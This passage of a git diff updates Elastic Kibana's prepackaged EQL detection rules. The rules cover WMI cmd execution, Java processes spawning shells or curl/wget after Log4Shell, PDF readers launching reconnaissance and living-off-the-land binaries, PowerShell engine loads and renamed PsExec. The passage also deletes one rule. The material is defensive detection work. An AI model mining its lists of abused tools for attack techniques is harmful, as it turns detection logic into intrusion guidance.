"host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], "risk_score": 47, "rule_id": "d461fac0-43e8-49e2-85ea-3a58fe120b4f", "severity": "medium", @@ -44,5 +76,5 @@ } ], "type": "eql", - "version": 3 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_cmd_wmi.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_cmd_wmi.json index a72c764b3463e..545b525455142 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_cmd_wmi.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_cmd_wmi.json @@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Cmd Execution via WMI", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"WmiPrvSE.exe\" and process.name : \"cmd.exe\" and\n process.args : \"\\\\\\\\127.0.0.1\\\\*\" and process.args : (\"2>&1\", \"1>\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "12f07955-1674-44f7-86b5-c35da0a6f41a", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -43,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_image_load_wmi_ms_office.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_image_load_wmi_ms_office.json index fa82cda9e1620..9fa3761622268 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_image_load_wmi_ms_office.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_image_load_wmi_ms_office.json @@ -12,13 +12,41 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious WMI Image Load from MS Office", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "library where process.name : (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\", \"MSPUB.EXE\", \"MSACCESS.EXE\") and\n event.action : \"load\" and\n event.category : \"library\" and\n dll.name : \"wmiutils.dll\"\n", + "note": "", + "query": "any where\n (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n process.name : (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\", \"MSPUB.EXE\", \"MSACCESS.EXE\") and\n (dll.name : \"wmiutils.dll\" or file.name : \"wmiutils.dll\")\n", "references": [ "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16" ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "891cb88e-441a-4c3e-be2d-120d99fe7b0d", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -46,5 +74,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_jar_child_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_jar_child_process.json index 6a124ad3b5f94..ef48f78069e34 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_jar_child_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_jar_child_process.json @@ -11,15 +11,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious JAVA Child Process", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"java\" and\n process.name : (\"sh\", \"bash\", \"dash\", \"ksh\", \"tcsh\", \"zsh\", \"curl\", \"wget\")\n", "references": [ "https://www.lunasec.io/docs/blog/log4j-zero-day/", "https://github.com/christophetd/log4shell-vulnerable-app", "https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "8acb7614-1d92-4359-bfcf-478b6d9de150", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -55,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_java_netcon_childproc.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_java_netcon_childproc.json index 38a9a6ebf47e7..37a39cbd07f43 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_java_netcon_childproc.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_java_netcon_childproc.json @@ -17,6 +17,48 @@ "https://github.com/christophetd/log4shell-vulnerable-app", "https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], "risk_score": 73, "rule_id": "c3f5e1d8-910e-43b4-8d44-d748e498ca86", "severity": "high", @@ -58,5 +100,5 @@ } ], "type": "eql", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_pdf_reader.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_pdf_reader.json index 3264382e5476c..74207b94231de 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_pdf_reader.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_pdf_reader.json @@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious PDF Reader Child Process", - "note": "## Triage and analysis\n\n### Investigating Suspicious PDF Reader Child Process\n\nPDF is a common file type used in corporate environments and most machines have software to handle these files. This\ncreates a vector where attackers can exploit the engines and technology behind this class of software for initial access\nor privilege escalation.\n\nThis rule looks for commonly abused built-in utilities spawned by a PDF reader process, which is likely a malicious behavior.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve PDF documents received and opened by the user that could cause this behavior. Common locations include, but\nare not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full scan using the antimalware tool in place. This scan can reveal additional artifacts left in the system,\npersistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. \n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious PDF Reader Child Process\n\nPDF is a common file type used in corporate environments and most machines have software to handle these files. This\ncreates a vector where attackers can exploit the engines and technology behind this class of software for initial access\nor privilege escalation.\n\nThis rule looks for commonly abused built-in utilities spawned by a PDF reader process, which is likely a malicious behavior.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve PDF documents received and opened by the user that could cause this behavior. Common locations include, but\nare not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full scan using the antimalware tool in place. This scan can reveal additional artifacts left in the system,\npersistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : (\"AcroRd32.exe\",\n \"Acrobat.exe\",\n \"FoxitPhantomPDF.exe\",\n \"FoxitReader.exe\") and\n process.name : (\"arp.exe\", \"dsquery.exe\", \"dsget.exe\", \"gpresult.exe\", \"hostname.exe\", \"ipconfig.exe\", \"nbtstat.exe\",\n \"net.exe\", \"net1.exe\", \"netsh.exe\", \"netstat.exe\", \"nltest.exe\", \"ping.exe\", \"qprocess.exe\",\n \"quser.exe\", \"qwinsta.exe\", \"reg.exe\", \"sc.exe\", \"systeminfo.exe\", \"tasklist.exe\", \"tracert.exe\",\n \"whoami.exe\", \"bginfo.exe\", \"cdb.exe\", \"cmstp.exe\", \"csi.exe\", \"dnx.exe\", \"fsi.exe\", \"ieexec.exe\",\n \"iexpress.exe\", \"installutil.exe\", \"Microsoft.Workflow.Compiler.exe\", \"msbuild.exe\", \"mshta.exe\",\n \"msxsl.exe\", \"odbcconf.exe\", \"rcsi.exe\", \"regsvr32.exe\", \"xwizard.exe\", \"atbroker.exe\",\n \"forfiles.exe\", \"schtasks.exe\", \"regasm.exe\", \"regsvcs.exe\", \"cmd.exe\", \"cscript.exe\",\n \"powershell.exe\", \"pwsh.exe\", \"wmic.exe\", \"wscript.exe\", \"bitsadmin.exe\", \"certutil.exe\", \"ftp.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "53a26770-9cbd-40c5-8b57-61d01a325e14", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -43,5 +61,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 9 + "version": 11 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_powershell_imgload.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_powershell_imgload.json index bda8c28d7e982..4dba7c6590297 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_powershell_imgload.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_powershell_imgload.json @@ -12,10 +12,43 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious PowerShell Engine ImageLoad", - "note": "## Triage and analysis\n\n### Investigating Suspicious PowerShell Engine ImageLoad\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell without having to execute `PowerShell.exe` directly. This technique, often called\n\"PowerShell without PowerShell,\" works by using the underlying System.Management.Automation namespace and can bypass\napplication allowlisting and PowerShell security features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file\nmodifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n- Retrieve the implementation (DLL, executable, etc.) and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity can happen legitimately. Some vendors have their own PowerShell implementations that are shipped with\nsome products. These benign true positives (B-TPs) can be added as exceptions if necessary after analysis.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nAdministrative Templates > \nWindows PowerShell > \nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "library where dll.name : (\"System.Management.Automation.ni.dll\", \"System.Management.Automation.dll\") and\n/* add false positives relevant to your environment here */\nnot process.executable : (\"C:\\\\Windows\\\\System32\\\\RemoteFXvGPUDisablement.exe\", \"C:\\\\Windows\\\\System32\\\\sdiagnhost.exe\") and\nnot process.executable regex~ \"\"\"C:\\\\Program Files( \\(x86\\))?\\\\*\\.exe\"\"\" and\n not process.name :\n (\n \"Altaro.SubAgent.exe\",\n \"AppV_Manage.exe\",\n \"azureadconnect.exe\",\n \"CcmExec.exe\",\n \"configsyncrun.exe\",\n \"choco.exe\",\n \"ctxappvservice.exe\",\n \"DVLS.Console.exe\",\n \"edgetransport.exe\",\n \"exsetup.exe\",\n \"forefrontactivedirectoryconnector.exe\",\n \"InstallUtil.exe\",\n \"JenkinsOnDesktop.exe\",\n \"Microsoft.EnterpriseManagement.ServiceManager.UI.Console.exe\",\n \"mmc.exe\",\n \"mscorsvw.exe\",\n \"msexchangedelivery.exe\",\n \"msexchangefrontendtransport.exe\",\n \"msexchangehmworker.exe\",\n \"msexchangesubmission.exe\",\n \"msiexec.exe\",\n \"MsiExec.exe\",\n \"noderunner.exe\",\n \"NServiceBus.Host.exe\",\n \"NServiceBus.Host32.exe\",\n \"NServiceBus.Hosting.Azure.HostProcess.exe\",\n \"OuiGui.WPF.exe\",\n \"powershell.exe\",\n \"powershell_ise.exe\",\n \"pwsh.exe\",\n \"SCCMCliCtrWPF.exe\",\n \"ScriptEditor.exe\",\n \"ScriptRunner.exe\",\n \"sdiagnhost.exe\",\n \"servermanager.exe\",\n \"setup100.exe\",\n \"ServiceHub.VSDetouredHost.exe\",\n \"SPCAF.Client.exe\",\n \"SPCAF.SettingsEditor.exe\",\n \"SQLPS.exe\",\n \"telemetryservice.exe\",\n \"UMWorkerProcess.exe\",\n \"w3wp.exe\",\n \"wsmprovhost.exe\"\n )\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious PowerShell Engine ImageLoad\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell without having to execute `PowerShell.exe` directly. This technique, often called\n\"PowerShell without PowerShell,\" works by using the underlying System.Management.Automation namespace and can bypass\napplication allowlisting and PowerShell security features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file\nmodifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n- Retrieve the implementation (DLL, executable, etc.) and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity can happen legitimately. Some vendors have their own PowerShell implementations that are shipped with\nsome products. These benign true positives (B-TPs) can be added as exceptions if necessary after analysis.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "query": "any where (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : (\"System.Management.Automation.ni.dll\", \"System.Management.Automation.dll\") or\n file.name : (\"System.Management.Automation.ni.dll\", \"System.Management.Automation.dll\")) and\n\n/* add false positives relevant to your environment here */\nnot process.executable : (\"C:\\\\Windows\\\\System32\\\\RemoteFXvGPUDisablement.exe\", \"C:\\\\Windows\\\\System32\\\\sdiagnhost.exe\") and\nnot process.executable regex~ \"\"\"C:\\\\Program Files( \\(x86\\))?\\\\*\\.exe\"\"\" and\n not process.name :\n (\n \"Altaro.SubAgent.exe\",\n \"AppV_Manage.exe\",\n \"azureadconnect.exe\",\n \"CcmExec.exe\",\n \"configsyncrun.exe\",\n \"choco.exe\",\n \"ctxappvservice.exe\",\n \"DVLS.Console.exe\",\n \"edgetransport.exe\",\n \"exsetup.exe\",\n \"forefrontactivedirectoryconnector.exe\",\n \"InstallUtil.exe\",\n \"JenkinsOnDesktop.exe\",\n \"Microsoft.EnterpriseManagement.ServiceManager.UI.Console.exe\",\n \"mmc.exe\",\n \"mscorsvw.exe\",\n \"msexchangedelivery.exe\",\n \"msexchangefrontendtransport.exe\",\n \"msexchangehmworker.exe\",\n \"msexchangesubmission.exe\",\n \"msiexec.exe\",\n \"MsiExec.exe\",\n \"noderunner.exe\",\n \"NServiceBus.Host.exe\",\n \"NServiceBus.Host32.exe\",\n \"NServiceBus.Hosting.Azure.HostProcess.exe\",\n \"OuiGui.WPF.exe\",\n \"powershell.exe\",\n \"powershell_ise.exe\",\n \"pwsh.exe\",\n \"SCCMCliCtrWPF.exe\",\n \"ScriptEditor.exe\",\n \"ScriptRunner.exe\",\n \"sdiagnhost.exe\",\n \"servermanager.exe\",\n \"setup100.exe\",\n \"ServiceHub.VSDetouredHost.exe\",\n \"SPCAF.Client.exe\",\n \"SPCAF.SettingsEditor.exe\",\n \"SQLPS.exe\",\n \"telemetryservice.exe\",\n \"UMWorkerProcess.exe\",\n \"w3wp.exe\",\n \"wsmprovhost.exe\"\n )\n", + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "852c1f19-68e8-43a6-9dce-340771fe1be3", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +83,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_psexesvc.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_psexesvc.json index e9c10e387e6ea..4aed3f8438ada 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_psexesvc.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_psexesvc.json @@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Process Execution via Renamed PsExec Executable", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\", \"info\") and\n process.pe.original_file_name : \"psexesvc.exe\" and not process.name : \"PSEXESVC.exe\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "e2f9fdf5-8076-45ad-9427-41e0e03dc9c2", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_short_program_name.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_short_program_name.json deleted file mode 100644 index e1e3ecefd2bc8..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_short_program_name.json +++ /dev/null @@ -1,30 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Identifies process execution with a single character process name. This is often done by adversaries while staging or executing temporary utilities.", - "from": "now-9m", - "index": [ - "winlogbeat-*", - "logs-endpoint.events.*", - "logs-windows.*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Suspicious Execution - Short Program Name", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and length(process.name) > 0 and\n length(process.name) == 5 and host.os.name == \"Windows\" and length(process.pe.original_file_name) > 5\n", - "risk_score": 47, - "rule_id": "17c7f6a5-5bc9-4e1f-92bf-13632d24384d", - "severity": "medium", - "tags": [ - "Elastic", - "Host", - "Windows", - "Threat Detection", - 